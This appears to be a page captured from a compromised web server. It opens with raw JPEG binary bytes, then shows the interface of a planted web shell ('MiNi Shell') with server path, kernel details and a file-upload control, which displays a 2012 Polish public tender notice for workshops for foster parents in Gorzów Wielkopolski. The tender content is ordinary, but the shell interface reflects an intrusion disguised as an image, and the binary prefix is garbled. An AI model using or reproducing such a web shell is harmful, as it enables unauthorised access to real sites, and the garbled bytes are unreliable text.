JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120724/266208-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Warsztaty aktywizacji społecznej i edukacyjnej przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego</b><br>
<b>Numer ogłoszenia: 266208 - 2012; data zamieszczenia: 24.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Gorzowie Wlkp. , ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 0-95 7330-458, faks 0-95 7330-459.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.powiatgorzowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Warsztaty aktywizacji społecznej i edukacyjnej przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są Warsztaty aktywizacji społecznej przy wykorzystaniu instrumentów aktywnej integracji dla Beneficjentów Ostatecznych projektu Nowe umiejętności-nowe możliwości pochodzących z Powiatu Gorzowskiego.

Projekt Nowe umiejętności - nowe możliwości, w ramach którego realizowane będzie zadanie Aktywna integracja ma na celu zmniejszenie ryzyka wystąpienia lub redukcji istniejącego już zjawiska wykluczenia społecznego u osób korzystających z pomocy społecznej z terenu Powiatu Gorzowskiego w wieku 15 - 64 lat.

W ramach niniejszego zamówienia Wykonawca musi zapewnić przeprowadzenie usług w następującym zakresie:
	
Część I
Organizacja stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego.
	
Część II
Organizacja stacjonarnego poradnictwa specjalistycznego, służąca przywróceniu samodzielności życiowej oraz wzmocnieniu wiary we własne możliwości wychowawcze

Część III
Trening kompetencji i umiejętności społecznych poprzez integrację ze środowiskiem rodzicielstwa zastępczego

Wymagania minimalne dotyczące czasu trwania, wyżywienia, transportu i ubezpieczenia:
Część I
Dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (26 osób) zorganizowanie i przeprowadzenie stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego. W czasie stacjonarnego wsparcia powinny odbyć się zajęcia wspierające relacje rodziców z dziećmi, podnoszące ich umiejętności wychowawcze, uczące w sposób kreatywny rozwiązywać konflikty. 
Grupa powinna zostać podzielona na 2 podgrupy, każda po 13 osób.
W czasie stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego Wykonawca zapewni przeprowadzenie zajęć przez dwóch specjalistów, którzy będą jednocześnie prowadzili zajęcia z każdą z dwóch podgrup. Muszą one zawierać nie mniej niż 7 spotkań każde z nich trwające 2 godziny zegarowe. Spotkania muszą odbywać się w weekendy tj. sobota i/lub niedziela (z wyłączeniem dni ustawowo świątecznych). Łączna ilość godzin stacjonarnego wsparcia grupowego musi wynosić nie mniej niż 14 godzin dla każdej z dwóch podgrup. Dla obu podgrup zajęcia muszą odbywać się w osobnych terminach niezależnie od siebie i być prowadzone przez dwóch specjalistów. 

Część II
Dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (12 osób) organizacja grupowego stacjonarnego poradnictwa specjalistycznego mającego na celu podniesienie świadomości prawnej oraz wzmocnienie wiary we własne możliwości wychowawcze i ukierunkowanie rodzica w radzeniu sobie z przeszkodami natury formalnej (m.in. pozyskiwanie dokumentacji medycznej, sądowej, z urzędu stanu cywilnego, ośrodka pomocy społecznej, powiatowego centrum pomocy rodzinie), warsztaty praktyczne w oparciu o inne konkretne potrzeby, zgłoszone w trakcie zajęć. Wykonawca zapewni przeprowadzenie dwóch spotkań trwających po 3 godziny zegarowe z co najmniej jedną 15 minutową przerwą. Łączna ilość godzin: 6 godzin zegarowych.

Część III
Dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (12 osób) organizacja treningu kompetencji i umiejętności społecznych poprzez integrację ze środowiskiem rodzicielstwa zastępczego.
W czasie spotkań muszą odbyć się zajęcia wspierające proces mający na celu pomoc w ustaleniu przyczyn trudnych zachowań dzieci przyjętych oraz ukazanie sposobów radzenia sobie z tymi zachowaniami; zapoznanie uczestników z różnymi metodami rozwiązywania konfliktów, umożliwienie zintegrowania środowiska rodzin zastępczych, planowania ścieżki życiowej wychowanków, przygotowanie wychowanków do samodzielności. 
Muszą one zawierać nie mniej niż 3 spotkania każde z nich trwające 2 godziny zegarowe. Spotkania muszą odbywać się w weekendy tj. sobota - niedziela (z wyłączeniem dni ustawowo świątecznych). Łączna ilość godzin treningu kompetencji musi wynosić nie mniej niż 6. Spotkania muszą być prowadzone przez jednego specjalistę. 

Minimalny zakres przedmiotowy

Część I 
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- zajęć wspierających relacje rodziców z dziećmi, 
- zajęć podnoszących umiejętności wychowawcze, 
- zajęć ćwiczących postawy rodzicielskie,
- kreatywnego sposobu rozwiązywania konfliktów,
- budowania u dziecka samoakceptacji i poczucia własnej wartości

Część II
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- podnoszenia świadomości prawnej i ukierunkowania rodzica (w tym rodzica zastępczego) w radzeniu sobie z przeszkodami natury formalnej (m.in. pozyskiwanie dokumentacji medycznej, sądowej, z urzędu stanu cywilnego, ośrodka pomocy społecznej, powiatowego centrum pomocy rodzinie), 
- opieki prawnej,
- prawa rodziny zastępczej w świetle Kodeksu Rodzinnego i Opiekuńczego,
- obowiązki rodziny zastępczej (występowanie o alimenty, pozbawienie władzy rodzicielskiej)
Ponadto zakres przedmiotowy powinien zapewnić przeprowadzenie warsztatów praktycznych w oparciu o inne konkretne potrzeby, zgłoszone w trakcie zajęć.

Część III
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- organizacji zajęć mających na celu pomoc w ustaleniu przyczyn trudnych zachowań dzieci przyjętych do rodziny zastępczej oraz ukazanie sposobów radzenia sobie z tymi zachowaniami 
- zapoznania uczestników z różnymi metodami rozwiązywania konfliktów, w tym konfliktów w relacjach wychowanek - rodzic zastępczy-rodzic biologiczny
- wyzwań wychowawczych związanych z dorastaniem,
- dojrzałości do rozstania jako etapu rozwojowego,
 - założenia funkcjonowania grupy wsparcia rodzin zastępczych - dlaczego tworzy się grupy wsparcia,  podstawy ich funkcjonowania.

Wymagania dotyczące kadry:

Część I 
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez dwóch specjalistów prowadzących jednocześnie czasie zajęcia dla grupy (zajęcia obu podgrup muszą odbywać się w oddzielnych terminach i zajęcia w każdej podgrupie muszą prowadzić dwaj specjaliści, łącznie dla jednej podgrupy zajęcia mają obejmować 14 godzin zegarowych i muszą być prowadzone przez dwóch specjalistów jednocześnie), dopuszcza się prowadzenie zajęć przez: 
a) dwóch pedagogów lub
b) pedagoga i psychologa lub
c) dwóch psychologów
Każdy z w/w specjalistów musi posiadać minimum dwuletnie doświadczenie zawodowe.
Na koniec warsztatów każdy uczestnik musi otrzymać zaświadczenie potwierdzające uczestnictwo w warsztatach.

Część II
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez prawnika lub radcę prawnego specjalizującego się w prawie rodzinnym.

Część III
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez co najmniej następujących specjalistów: 
a) pedagoga, posiadającego minimum dwuletnie doświadczenie zawodowe i
c) psychologa, posiadającego minimum dwuletnie doświadczenie w zawodowe

Wymagania dotyczące budynków, w których realizowany będzie przedmiot zamówienia
Część I 
Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca musi zapewnić także niezbędny sprzęt multimedialny np. telewizor, DVD, magnetofon.
	
Część II
Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca zapewnia także zabezpieczenie niezbędnego sprzętu multimedialnego np. telewizora DVD, magnetofonu.

Część III
Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca zapewnia także zabezpieczenie niezbędnego sprzętu multimedialnego np. telewizora DVD, magnetofonu.

Pozostałe zobowiązania i postanowienia:
1) Wykonawca zobowiązany jest do prowadzenia działań informacyjnych i promocyjnych kierowanych do uczestników poprzez umieszczenie obowiązujących logotypów na wszystkich dokumentach dotyczących projektu systemowego, w tym materiałach informacyjnych dotyczących usługi oraz informowania uczestników o współfinansowaniu projektu systemowego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. Należy to zrobić stosując odpowiednie logotypy oraz informację: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego. Zamawiający udostępni Wykonawcy wzory obowiązujących logotypów, a Wykonawca we własnym zakresie zapewni wydruk w/w oznaczeń, 
2) Wykonawca zobowiązany jest do prowadzenia dokumentacji przebiegu zajęć stanowiącej dziennik zajęć zawierający listę obecności, wymiar godzin pracy i tematy zajęć, rejestr wydanych zaświadczeń potwierdzających ukończenie zajęć, 
3) Wykonawca zobowiązany jest do przechowywania dokumentacji związanej z realizacją projektu systemowego do dnia 31.12.2020 r. w sposób zapewniający dostępność, poufność, bezpieczeństwo oraz do informowania Zamawiającego o miejscu archiwizacji dokumentów związanych z realizacją niniejszego zamówienia. W przypadku zmiany adresu archiwizacji dokumentów, zawieszenia lub zaprzestania przez Wykonawcę działalności przed terminem 31.12.2020 r. Wykonawca powiadomi Zamawiającego o tym na piśmie. Wykonawca zobligowany jest przekazać oryginały dokumentacji z zajęć Zamawiającemu.
4) Wykonawca zobowiązany jest do niezwłocznego informowania w formie telefonicznej oraz jednocześnie pisemnej Zamawiającego o problemach w realizacji usługi będącej przedmiotem zamówienia,
5)Wykonawca zobligowany jest do zarejestrowania się, nie później niż w dniu podpisania umowy, w internetowej bazie ofert szkoleniowych www.inwestycjawkadry.pl i aktualizacji informacji o każdym etapie organizowanych zajęć w ramach Projektu systemowego nie rzadziej niż raz w miesiącu, zgodnie z zakresem danych określonym przez Instytucję Pośredniczącą. Wydruk z rejestracji na w/w stronie Wykonawca zobligowany jest przedstawić Zamawiającemu najpóźniej w dniu podpisania umowy.
6) Wykonawca zobowiązany jest do poddania się kontroli dokonywanej przez Zamawiającego oraz inne uprawnione podmioty w zakresie prawidłowości realizacji usługi będącej przedmiotem zamówienia. Kontrola może zostać przeprowadzona zarówno w siedzibie Wykonawcy, jak i w miejscu realizacji usługi będącej przedmiotem zamówienia,
7) Wykonawca zobowiązany jest do zapewnienia kontrolującym prawo wglądu we wszystkie dokumenty związane z realizacją Projektu systemowego, przez cały okres ich przechowywania, 
8) Udzielanie na pisemne wezwanie Zamawiającego wszelkich informacji i wyjaśnień związanych z realizacją zamówienia, w terminie określonym w wezwaniu przez cały okres realizacji zamówienia oraz okres, o którym mowa w pkt.3, 
9) Zamawiający ma prawo przeprowadzania czynności monitorujących podczas trwania usługi, w szczególności do przeprowadzania ankiet, rozmów, konsultacji z uczestnikami, trenerami,  
10) Na podstawie art. 31 ust. 1 ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926, ze zm.), Zamawiający zleca Wykonawcy przetwarzanie danych osobowych w zakresie określonym przez Zamawiającego, 
11) Celem przetwarzania danych osobowych jest umożliwienie monitoringu, kontroli i ewaluacji Projektu systemowego, 
12) W zakresie, o którym mowa w pkt. 9 Wykonawca zobowiązuje się do współpracy z ewaluatorami zewnętrznymi, prowadzącymi badania na zlecenie Zamawiającego lub przez inne podmioty posiadające uprawnienia do przeprowadzenia tego typu badań,  
13) Ze strony Wykonawcy do przetwarzania danych dopuszczone mogą być jedynie osoby które uzyskały imienne upoważnienie zgodnie z art. 37 ustawy o ochronie danych osobowych, o której mowa pkt. 10, po podpisaniu oświadczenia o zachowaniu w tajemnicy danych osobowych, do których osoby te uzyskają dostęp w związku z wykonywaniem umowy. Imienne upoważnienia, o których mowa powyżej wydane będą przez Wykonawcę,
14) Wykonawca wyraża zgodę na upublicznienie swoich danych teleadresowych przez Zamawiającego oraz inne uprawnione do tego podmioty,
15) Wykonawca zobowiązany jest do stosowania aktualnych wytycznych w zakresie zasad przygotowania, realizacji rozliczania projektów systemowych powiatowych centrów pomocy rodzinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony i podpisany Formularz Oferty, stanowiący załącznik nr 1 do SIWZ,
PZP, sporządzone według załącznika nr 2 do SIWZ,
2) haromonogram zajęć dla części I sporządzony według załącznika nr 4a do SIWZ - dla każdej z dwóch podgrup należy sporządzić i złożyć oddzielny harmonogram
3) haromonogram zajęć dla części II sporządzony według załącznika nr 4b do SIWZ,
4) haromonogram zajęć dla części III sporządzony według załącznika nr 4c do SIWZ 
5) Jeżeli Wykonawca, wykazując spełnianie warunków o których mowa w art. 22 ust. 1 PZP polega na zasobach innych podmiotów, na zasadach określonych w art. 26 ust. 2b ustawy PZP, zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, sporządzone według załącznika nr 3a do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiatgorzowski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400
Gorzów Wlkp. woj. lubuskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 13:00, miejsce: Powiatowe Centrum Pomocy Rodzinie ul. Józefa Pankiewicza 5-7, 66-400 Gorzów Wlkp. woj. lubuskie - sekretariat pok. 208.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pod nazwą Nowe umiejętności - nowe możliwości, w ramach którego realizowane jest zadanie Aktywna integracja współfinansowany jest przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego dla rodziców zastępczych, osób prowadzących rodzinne domy dziecka lub osób z problemami opiekuńczo-wychowawczymi: (26 osób) zorganizowanie i przeprowadzenie stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego. W czasie stacjonarnego wsparcia powinny odbyć się zajęcia wspierające relacje rodziców z dziećmi, podnoszące ich umiejętności wychowawcze, uczące w sposób kreatywny rozwiązywać konflikty. 
Grupa powinna zostać podzielona na 2 podgrupy, każda po 13 osób.
W czasie stacjonarnego wsparcia grupowego w zakresie podniesienia kompetencji życiowych i umiejętności społeczno-zawodowych umożliwiających docelowo powrót do życia społecznego Wykonawca zapewni przeprowadzenie zajęć przez dwóch specjalistów, którzy będą jednocześnie prowadzili zajęcia z każdą z dwóch podgrup. Muszą one zawierać nie mniej niż 7 spotkań każde z nich trwające 2 godziny zegarowe. Spotkania muszą odbywać się w weekendy tj. sobota i/lub niedziela (z wyłączeniem dni ustawowo świątecznych). Łączna ilość godzin stacjonarnego wsparcia grupowego musi wynosić nie mniej niż 14 godzin dla każdej z dwóch podgrup. Dla obu podgrup zajęcia muszą odbywać się w osobnych terminach niezależnie od siebie i być prowadzone przez dwóch specjalistów. 
Zakres przedmiotowy powinien zapewnić omówienie materiału z zakresu:
- zajęć wspierających relacje rodziców z dziećmi, 
- zajęć podnoszących umiejętności wychowawcze, 
- zajęć ćwiczących postawy rodzicielskie,
- kreatywnego sposobu rozwiązywania konfliktów,
- budowania u dziecka samoakceptacji i poczucia własnej wartości
Wykonawca zobowiązuje się do przeprowadzenia zaplanowanej usługi przez dwóch specjalistów prowadzących jednocześnie czasie zajęcia dla grupy (zajęcia obu podgrup muszą odbywać się w oddzielnych terminach i zajęcia w każdej podgrupie muszą prowadzić dwaj specjaliści, łącznie dla jednej podgrupy zajęcia mają obejmować 14 godzin zegarowych i muszą być prowadzone przez dwóch specjalistów jednocześnie), dopuszcza się prowadzenie zajęć przez: 
	a) dwóch pedagogów lub
	b) pedagoga i psychologa lub
	c) dwóch psychologów
	Każdy z w/w specjalistów musi posiadać minimum dwuletnie doświadczenie zawodowe.
Na koniec warsztatów każdy uczestnik musi otrzymać zaświadczenie potwierdzające uczestnictwo w warsztatach.
Zajęcia muszą odbywać się na terenie miasta Gorzowa Wlkp. Szkolenie musi być prowadzone w sali szkoleniowej, przystosowanej do prowadzenia kursów. Każdy uczestnik powinien mieć zapewniony stolik z krzesłem, w sali powinna znajdować się tablica. Wykonawca musi zapewnić także niezbędny sprzęt multimedialny np. telewizor, DVD, magnetofon..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja stacjonarnego poradnictwa specjalistycznego, służąca przywróceniu samodzielności życiowej oraz wzmocnieniu wiary we własne możliwości wychowawcze.</p>
